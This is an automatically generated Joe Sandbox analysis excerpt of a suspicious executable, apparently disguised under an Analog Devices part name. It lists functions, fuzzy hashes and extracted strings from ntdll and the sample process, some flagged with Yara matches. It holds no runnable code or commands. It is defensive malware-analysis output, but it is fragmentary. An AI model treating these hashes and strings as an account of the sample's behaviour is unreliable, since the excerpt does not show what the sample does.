Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe14d0494f2fcc24fa4dfaff56d2b95d8117f1a8fe1fab1cc8716d52f939309
Instruction ID: 44b4da7218f7e2ae0ec85098cec6baab14a16b783bf3f25d0382173f6cf7a9a9
Opcode Fuzzy Hash: 5fe14d0494f2fcc24fa4dfaff56d2b95d8117f1a8fe1fab1cc8716d52f939309
Instruction Fuzzy Hash: 3590026120580403D38075594804607400597D0302F55C021B6064565ECA798E516636

Function 01742EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf5cc6caf40b07c52229a2a24dfd25abfa62826de38b7bbf67d1e26869b8068
Instruction ID: 4eacbea2538fd462fb719a57f08e68ae111f7e6d2b3615c2825ab135e8457837
Opcode Fuzzy Hash: 4bf5cc6caf40b07c52229a2a24dfd25abfa62826de38b7bbf67d1e26869b8068
Instruction Fuzzy Hash: 6690027120540403D38071594404746400597D0301F55C021B9064564EC6A98FD56B66

Function 01742E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1f5eb8b7a54ac10fefdba9c23a55ec5efdead00b03e0f987e85c9255668b54
Instruction ID: c78dd3200f13abad4ebd9ff50eee4167d4e3e2410b02eedf0c89e47569785aa5
Opcode Fuzzy Hash: 3c1f5eb8b7a54ac10fefdba9c23a55ec5efdead00b03e0f987e85c9255668b54
Instruction Fuzzy Hash: B090022160540503D34171594404616400A97D0241F95C032B5024565ECA758B92A632

Function 01743010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a498ca4ced10380bf326da02517233d407ebcbf7ac81fb10ae4ee21692947ac0
Instruction ID: a6d814e139fd7a830af2fee616fb0de071a24aec9476f140b10726e7d33fe013
Opcode Fuzzy Hash: a498ca4ced10380bf326da02517233d407ebcbf7ac81fb10ae4ee21692947ac0
Instruction Fuzzy Hash: FD90022120584443D38072594804B0F810597E1202F95C029B8156564CC9658A555B22

Function 01743090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c43d94005eaadd8b5da04bfb9480ebe31b8cbb3d99dbb8e2583c6b48428bfbbf
Instruction ID: 5f31d5440468c5cedad882dc1a94f153e09b284b45d4e1304582bead1b4be591
Opcode Fuzzy Hash: c43d94005eaadd8b5da04bfb9480ebe31b8cbb3d99dbb8e2583c6b48428bfbbf
Instruction Fuzzy Hash: FD90022124540803D380715984147074006D7D0601F55C021B4024564DC6668B656BB2

Function 017439B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524b633ba3c977d04e67093ba9c9d8746fd7ecea47690b705800c6f8b7eff953
Instruction ID: 2694b7ce6c947444e1268dde26464fa04e141b15a85dcea851e5ffbe5ac4b67b
Opcode Fuzzy Hash: 524b633ba3c977d04e67093ba9c9d8746fd7ecea47690b705800c6f8b7eff953
Instruction Fuzzy Hash: D590022124945103D390715D44046168005B7E0201F55C031B48145A4DC5A58A556722

Function 01743D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b125bab850c5d0e454afdab663b3117340c2f79e8746aecea5e6916de8106c
Instruction ID: c7f15bbbb8d73fe7e6c2ea1c2e2b53f63e9b2a58576f0606236c3bc53674656e
Opcode Fuzzy Hash: 54b125bab850c5d0e454afdab663b3117340c2f79e8746aecea5e6916de8106c
Instruction Fuzzy Hash: 8890023520540403D75071595804646404697D0301F55D421B4424568DC6A48AA1A622

Function 01743D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8b777232d55bc4811dbc98b5c78ec5a033b00a3e87b6bf3331fb00b65fc6d5
Instruction ID: c4fea80aecf9986e42121575a12d453a39a7df06411991bda978574dec51cef5
Opcode Fuzzy Hash: fa8b777232d55bc4811dbc98b5c78ec5a033b00a3e87b6bf3331fb00b65fc6d5
Instruction Fuzzy Hash: 6A90023120640143978072595804A4E810597E1302B95D425B4015564CC9648A615722

Function 01742C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 3f432510085d59350e90f41cf2dcd2e379725e596ea9645a8c31b2eecff65d51
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01742890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0174293C
___swprintf_l.LIBCMT ref: 0174295E
___swprintf_l.LIBCMT ref: 017429A3
___swprintf_l.LIBCMT ref: 0177A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0177A527
::ffff:0:%u.%u.%u.%u, xrefs: 0177A54E
:%u.%u.%u.%u, xrefs: 0177A5B8
ffff:, xrefs: 0177A504

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 5846e797edf3d9f7c5de31bcb92a1d108c719179ee55fdf7db5168f398840b9d
Instruction ID: 0c2a454417ee1ac51f2df1e593369d0d54dfbe269c1900e23498d9d73cd9ee61
Opcode Fuzzy Hash: 5846e797edf3d9f7c5de31bcb92a1d108c719179ee55fdf7db5168f398840b9d
Instruction Fuzzy Hash: D551F6B6A00116BFDF11DFACD88097EFBB8BB08240B148269F569D7646D374DE10CBA0

Function 017B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017B24A6
___swprintf_l.LIBCMT ref: 017B24E2
___swprintf_l.LIBCMT ref: 017B257D
___swprintf_l.LIBCMT ref: 017B25A3
___swprintf_l.LIBCMT ref: 017B25C8
___swprintf_l.LIBCMT ref: 017B2608

Strings

::%hs%u.%u.%u.%u, xrefs: 017B249E
:%u.%u.%u.%u, xrefs: 017B25FF
::ffff:0:%u.%u.%u.%u, xrefs: 017B24DA
ffff:, xrefs: 017B247D, 017B249D

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 2ddfc9abf36cc2ec0fe3b91222499790a5cb7f82cc2a9a710d96c7865bd34969
Instruction ID: f7ee8878f97f8b71b31b7d9773a6a1f0130541d07ca89d734ae10c9bec2689fa
Opcode Fuzzy Hash: 2ddfc9abf36cc2ec0fe3b91222499790a5cb7f82cc2a9a710d96c7865bd34969
Instruction Fuzzy Hash: D251E471A00645AECB24DE5CCCD0ABFFBF9AF44200B148499E596D7646EBB8FE40C760

Function 01737630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 01774713
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01774742
CLIENT(ntdll): Processing section info %ws..., xrefs: 01774787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01774655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01774725
ExecuteOptions, xrefs: 017746A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017746FC

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1e79d365908ef3a21b5d2e045832c90f172d3c3ac6ef5a902e132d03695304f4
Instruction ID: 45ddf20e4a6140f88e1c3439f34d55ef30441ad5269e5b7f2f921b3edf172582
Opcode Fuzzy Hash: 1e79d365908ef3a21b5d2e045832c90f172d3c3ac6ef5a902e132d03695304f4
Instruction Fuzzy Hash: 74513CB164021ABBEF15ABA8DC99FAEF7A8EF55310F0400DDD606A7182D7709A41DF50

Function 017D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 186873baae7636f1d68c2792c503de3a7ec765761a5ba2776ba88c62c4085631
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 71023370508346AFD709CF28C494A6BFBF5EFC8704F54892DBA898B264DB31E945CB52

Function 0174B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0174B6BF

Strings

0, xrefs: 0174B66F
-, xrefs: 0174B650
0, xrefs: 0174B695
+, xrefs: 0174B65A

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 286007f0112c98751d04bbf9fa55e647e05b1deb9619d45a231460f21845294a
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 4581AD70A452499FEF2ACF6CC8917BEFBA6AF45320F18415AD861A7291C734DC408B92

Function 017B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017B214F
___swprintf_l.LIBCMT ref: 017B2172

Strings

]:%u, xrefs: 017B2169
%%%u, xrefs: 017B2146
[, xrefs: 017B212B

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 4101079802464f0cbae07fb2baa95edfd1efc0d0770bbfb31c71d91eec135ad0
Instruction ID: 18c6f82928a0eadbfb63d7342e0a524082e8cdf575fd80e31b1781df35059860
Opcode Fuzzy Hash: 4101079802464f0cbae07fb2baa95edfd1efc0d0770bbfb31c71d91eec135ad0
Instruction Fuzzy Hash: 5B21627AA0111DABDB10DF79DC84AFEFBF9EF54650F14011AEA05E3205E730E9028BA1

Function 0172F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017702E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017702BD
RTL: Re-Waiting, xrefs: 0177031E

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 73a12993849bf70e5ede79bcd73259a583be8eb20be78324e3303528e5fce0df
Instruction ID: dd2ca0c3aa7ac9a9b75a5b911360d5d90772c35ff7355b0c39c16051c9565a0c
Opcode Fuzzy Hash: 73a12993849bf70e5ede79bcd73259a583be8eb20be78324e3303528e5fce0df
Instruction Fuzzy Hash: 1EE189316087529FDB25CF28C884B2AFBF0EB85724F140A6DF5A58B2A1D774D946CB42

Function 0173BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01777B7F
RTL: Re-Waiting, xrefs: 01777BAC
RTL: Resource at %p, xrefs: 01777B8E

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 14edade411ef187bf091bd77e5abb8e6f388f64a1e1412a8b486d36771ccbe0d
Instruction ID: afb643c42df7bc87a1816de8e7e64a2796ab7423c36f8ebaae9f30f3178f2b5b
Opcode Fuzzy Hash: 14edade411ef187bf091bd77e5abb8e6f388f64a1e1412a8b486d36771ccbe0d
Instruction Fuzzy Hash: 5741E1313057039FDB24DE29C844B6AF7E5EF88720F000A2DFA5A9B691DB31E9058B91

Function 0173B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0177728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01777294
RTL: Re-Waiting, xrefs: 017772C1
RTL: Resource at %p, xrefs: 017772A3

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 66a59f1f42a76194fab4858cecef27a7350f9e294e3f1754e6a7be63dd117f2f
Instruction ID: f3ad2301fd62f7dd5c91554658af0e41f45253c582ad69cde2716e9fc5d2b7a0
Opcode Fuzzy Hash: 66a59f1f42a76194fab4858cecef27a7350f9e294e3f1754e6a7be63dd117f2f
Instruction Fuzzy Hash: 4341F031704202ABCB24DE29CC45F6AF7B5FB94710F100619F965AB281DB20E85287D1

Function 017B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017B238D
___swprintf_l.LIBCMT ref: 017B23B3

Strings

]:%u, xrefs: 017B23AA
%%%u, xrefs: 017B2384

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 270fa5558cfebe4737466b281af7ac3205b34303393b1bfbd39845942da45e13
Instruction ID: 8de9afabffbf18deaa659670652453f0f1da6ace4040e7e8d33b8a4eb2433d26
Opcode Fuzzy Hash: 270fa5558cfebe4737466b281af7ac3205b34303393b1bfbd39845942da45e13
Instruction Fuzzy Hash: 4A319872A01219AFDB20DF2DCC84BEEF7F8EF44610F544559E949E3205EB30AA458BA0

Function 01747D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01747E8B

Strings

+, xrefs: 01747DE8
-, xrefs: 01747DDD

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 466bd25eeb1db6767427df12dd434f3582f66292f1e2f479eb2835354a7d3599
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: AF91D471E0021A9BEF38DF6DC881ABEFBA5FF44320F54461AE965E72C4D73099818B11

Function 01709126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01709175
$, xrefs: 01709191

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: bb38004f2037f7dd33f05cda22e30149dffbcf9f2d5b9dbb59137eaef5916a1c
Instruction ID: 22db77d6f31c5fb12887fbb15b1ca6096957c76bea70921cd1c62f594ee126bc
Opcode Fuzzy Hash: bb38004f2037f7dd33f05cda22e30149dffbcf9f2d5b9dbb59137eaef5916a1c
Instruction Fuzzy Hash: 6B812B71D01269DBDB72DB54CC44BEAB7B8AB48714F0041EAEA0DB7681D7705E85CFA0

Analysis Process: cvSKtqilyhlQ.exePID: 5856, Parent PID: 1908COMMON

Executed Functions

Function 03009832 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f818420793ae59cfbc1bf9e7813d79cf02619b8c4860208404c2a07ce4080f2
Instruction ID: b129972469609f11c2f17eb610a1d797c29b70990ea00fb6351fcf4eb0358d11
Opcode Fuzzy Hash: 6f818420793ae59cfbc1bf9e7813d79cf02619b8c4860208404c2a07ce4080f2
Instruction Fuzzy Hash: AA3187116593F14EE30E836D08BD675AFD18E57201B4EC2EEDADA5F2F3C4488418D3A5

Function 0300917B Relevance: 22.9, Strings: 18, Instructions: 356COMMON

Download Yara Rule

Strings

+Gr!2, xrefs: 030097BC
E, xrefs: 03009205
<U, xrefs: 03009334
!2, xrefs: 0300941C
,D, xrefs: 030093FE
N, xrefs: 030093CF
BW, xrefs: 0300923F
q, xrefs: 030091E9
/R, xrefs: 0300918B
fU, xrefs: 03009271
H, xrefs: 03009369
2, xrefs: 030093BB
), xrefs: 03009377
!t, xrefs: 0300922B
^%, xrefs: 030092CC
', xrefs: 0300920C
[, xrefs: 03009370
CR, xrefs: 03009235

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID: !2$!t$'$)$,D$/R$2$<U$BW$CR$E$H$N$[$^%$fU$q$+Gr!2
API String ID: 0-4080861076
Opcode ID: faa0977dafcbe2c0aa43fdc968b2f88f680dc1729fd8cdb40f62978a9b40e5d0
Instruction ID: a25af1990ca3cf42bf2a7fb050987bafc885c05ce6d327802beb340ebf0a67b1
Opcode Fuzzy Hash: faa0977dafcbe2c0aa43fdc968b2f88f680dc1729fd8cdb40f62978a9b40e5d0
Instruction Fuzzy Hash: 2012B0B0D06229CBEB24CF85C994BEDBBB2BF84308F1085D9D1097B291D7B95A84CF55

Function 03016CCB Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

S, xrefs: 03016D4B
\, xrefs: 03016D67
6, xrefs: 03016D60
s, xrefs: 03016D52
O, xrefs: 03016D59

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 4b63e805e83a0d69982840a010deebe554ce6ff4e0e9a04184379fea8d21e829
Instruction ID: 1377943b2056269c510960d1e19b1d8c8448b116790ecedf6bd6b00fa55150ff
Opcode Fuzzy Hash: 4b63e805e83a0d69982840a010deebe554ce6ff4e0e9a04184379fea8d21e829
Instruction Fuzzy Hash: BC51A572D01218ABDB60DF94DC88FEFB7B8EF84711F044299ED086B140EBB15A548BE1

Function 030244EB Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

-6, xrefs: 03024544

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID: -6
API String ID: 0-2924076425
Opcode ID: 493d2736c5ffb51b04c272362da028233ac9860e49f86c4361ac9d02917166bb
Instruction ID: 35344b978c1586f43234f3df9895abdbd2b5226ee7c5f22f9bfb27560ebae419
Opcode Fuzzy Hash: 493d2736c5ffb51b04c272362da028233ac9860e49f86c4361ac9d02917166bb
Instruction Fuzzy Hash: 492100F6D01219AF8B00DFA9D8419EFB7F9EF88210F14815AE915E7204E7709A05CFE0

Function 03024C4B Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

*0, xrefs: 03024C96

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID: *0
API String ID: 0-141291131
Opcode ID: 9d50e9c459db02b05b10eeb5fa809e67f7f314ce068a33fca364f8aed638c424
Instruction ID: c1bc01ba3941d58e811492e24502ca27fcff7a4e0992aedd22d0abbe33cd7026
Opcode Fuzzy Hash: 9d50e9c459db02b05b10eeb5fa809e67f7f314ce068a33fca364f8aed638c424
Instruction Fuzzy Hash: 9611D0B6D0121CAF9F40DFE9D8409EEBBF9FF88214F14456AE919E7240E7705A158BA0

Function 03002A1B Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ebd31c31c90348354a06a4fd9f5576221add0a9f624840a82e8cd09506ccfe
Instruction ID: 8fce90705f350fcd77bef76f865650d25f5ff1fcc4114cd86ab12e0b7610bced
Opcode Fuzzy Hash: 78ebd31c31c90348354a06a4fd9f5576221add0a9f624840a82e8cd09506ccfe
Instruction Fuzzy Hash: 78412CB1D11228AFDB10CF99CC85AEEBFBCEF49710F10455AFA04E6241E7B19641CBA4

Function 03027D0B Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8785ed8cb6bae71f8831e48abb83cbd482692b90a2ac170c5e41e53e47a87e
Instruction ID: 6c1891cca3be6a6816391494e39339070868927eab1697480931a2a41c328c8b
Opcode Fuzzy Hash: da8785ed8cb6bae71f8831e48abb83cbd482692b90a2ac170c5e41e53e47a87e
Instruction Fuzzy Hash: 1431A7B5A01608AFDB14DF99D981EEEB7F9EF8C710F108219F919A7340D770A911CBA4

Function 03027E7B Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e6c774c8ae71aebcaabb6c8a0820ba1e75e0a7f3b6d4bb8beeee838d21faa8
Instruction ID: 78662d1d01a6e1a4c63c68c7c832ca6290db69947ee9efc3eb0ea2f7097cad8c
Opcode Fuzzy Hash: 77e6c774c8ae71aebcaabb6c8a0820ba1e75e0a7f3b6d4bb8beeee838d21faa8
Instruction Fuzzy Hash: AB31A7B5A01608AFDB14DF98D981EEFBBF9EF88710F108119F919A7340D770A9118BA5

Function 0302774B Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

